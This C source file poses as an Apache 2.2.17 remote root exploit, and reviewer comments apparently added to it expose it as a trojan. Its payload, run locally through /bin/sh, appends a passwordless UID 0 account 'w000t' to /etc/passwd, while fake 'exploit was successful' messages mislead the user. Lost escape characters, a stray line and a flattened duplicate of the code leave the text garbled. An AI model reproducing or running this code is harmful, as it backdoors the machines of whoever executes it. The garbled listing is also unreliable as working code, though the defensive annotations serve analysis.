/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you :) ~ desg */

#include   <stdio.h>
#include   <stdlib.h>
#include   <string.h>
#include   <strings.h>
#include   <netdb.h>
#include   <unistd.h>
#include   <sys/types.h>
#include   <sys/socket.h>
#include   <netinet/in.h>
#include   <arpa/inet.h>

/*
 * Payload string. main() copies it into the buffer it sends and also hands
 * it to a local "/bin/sh -c" in a forked child.
 *
 * NOTE(review): as shown here every "xNN" is literal text. Presumably these
 * were "\xNN" escapes whose backslashes were lost in extraction (the printf
 * strings in main() end in a bare "n" the same way) -- confirm against an
 * original copy before drawing conclusions from this listing.
 *
 * Read as hex bytes, the run from x2f onward is printable ASCII: "/bin/sh",
 * "-c", and a /bin/echo command that appends a line to /etc/passwd for an
 * account named w000t with UID 0, GID 0 and an empty password field,
 * followed by AAAA/BBBB/CCCC/DDDD filler. The leading bytes look like x86
 * code that ends in int 0x80 (cd 80); that part is not verified here.
 *
 * Nothing in the string refers to Apache or HTTP. Treat this file as a
 * trojan aimed at whoever builds and runs it, not as a remote exploit: an
 * unexpected w000t line in /etc/passwd is the indicator to look for on a
 * host where it was executed.
 */
char evil[] =
            "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
            "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
            "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
            "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
            "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
            "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
            "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
            "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
            "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
            "x44x44";

/*
 * Buffer-layout constants. Only BSIZE and ASIZE are referenced by the
 * main() in this listing; NOP, OFFSET and ADDR are defined but never used,
 * so no padding or address is ever written into the buffer that is sent.
 */
#define     NOP   0x90
#define     BSIZE 1000
#define     OFFSET     400
#define     ADDR 0xbffff658
#define ASIZE     2000

/*
 * Entry point: takes one host name, opens a TCP connection to port 80 on
 * it, sends a mostly uninitialised heap buffer, then forks a child that runs
 * `evil` through /bin/sh -c on the LOCAL machine.
 *
 * Reviewer summary (defensive reading of the visible code):
 *  - No HTTP request is built and nothing is ever read back from the socket,
 *    so the "shell" step cannot be the result of anything the remote host did.
 *  - The only place `evil` takes effect is the local execl() near the end.
 *  - The success/failure messages do not reflect any check of the target.
 *
 * argv[1] is the host name to resolve. The function never returns: it either
 * calls exit(1) on an error path or spins in the final while (1).
 */
int
main(int argc, char *argv[])
{
      char *buffer;
      int s;
      struct hostent *hp;
      struct sockaddr_in sin;
      if (argc != 2) {
            printf("%s <target>n", argv[0]);
            exit(1);
        }
      /* BSIZE + ASIZE + 100 bytes; malloc() leaves the contents indeterminate. */
      buffer = (char *) malloc(BSIZE + ASIZE + 100);
      if (buffer == NULL) {
            printf("Not enough memoryn");
            exit(1);
        }
      /* Places `evil` so that it ends at index BSIZE; nothing before or after
         it (apart from the two bytes below) is ever written. */
      memcpy(&buffer[BSIZE - strlen(evil)], evil,
            strlen(evil));
      buffer[BSIZE + ASIZE] = ';';
      /* '0' is the digit character, not a NUL terminator.
         NOTE(review): possibly '\0' with the backslash lost in extraction -- confirm. */
      buffer[BSIZE + ASIZE + 1] = '0';
      hp = gethostbyname(argv[1]);
      if (hp == NULL) {
            printf("no such servern");
            exit(1);
        }
      bzero(&sin, sizeof(sin));
      bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
      sin.sin_family = AF_INET;
      sin.sin_port = htons(80);
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (s < 0) {
            printf("Can't open socketn");
exit(1);
     }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
          printf("Connection refusedn");
          exit(1);
      }
    printf("sending exploit code...n");
    /* strlen(buffer) scans indeterminate heap bytes (undefined behaviour), so
       the amount sent is whatever precedes the first zero byte it happens to
       find. The "!= 1" test reports success for every return value except
       exactly 1, including -1 on a send() error. */
    if (send(s, buffer, strlen(buffer), 0) != 1)
          printf("exploit was successful!n");
      else
          printf("sorry, this site isn't vulnerablen");
    printf("waiting for shell.....n");
    /* The child runs `evil` as the command string of a local /bin/sh, with the
       privileges of whoever started this program; the socket is not involved.
       The argument list is terminated with a plain 0 rather than (char *)NULL,
       and wait() is used without <sys/wait.h> being included in this file. */
    if (fork() == 0)
          execl("/bin/sh", "sh", "-c", evil, 0);
      else
          wait(NULL);
    /* Busy-loops forever; no I/O happens here despite the "shell" comment. */
    while (1) { /* shell */ }
}


Yg byev2e

  • 1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" "x44x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memoryn"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such servern"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socketn");
  • 2. exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refusedn"); exit(1); } printf("sending exploit code...n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!n"); else printf("sorry, this site isn't vulnerablen"); printf("waiting for shell.....n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } }